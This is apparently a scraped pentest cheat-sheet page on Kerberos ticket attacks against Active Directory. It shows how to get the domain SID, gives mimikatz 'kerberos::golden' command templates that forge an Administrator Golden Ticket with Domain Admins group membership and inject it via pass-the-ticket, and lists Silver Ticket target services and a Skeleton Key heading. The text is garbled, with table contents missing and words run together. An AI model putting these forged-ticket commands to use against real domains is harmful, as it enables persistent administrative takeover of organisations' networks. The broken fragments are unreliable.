Tickets
Get domain SID
whoami /userS-1-5-21-1602875587-2787523311-2599479668 [-1103]
|------------------SID-------------------||--RID--|Golden Ticket
kerberos::golden /domain:<domain> /sid:<sid> /aes256:<aes> /user:<user> /groups:<groups> /pttkerberos::golden /User:Administrator /domain:<domain> /sid:<SID> /krbtgt:<ticket> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /pttParameter
Description
Mimikatz info dump
Silver Ticket
Parameter
Description
List of service attacks
Service
Silver Tickets service types required
WMI
PowerShell remoting / WinRM
Task Scheduler
Windows File Share
LDAP Desync attack
MSSQL
Skeleton Key
Last updated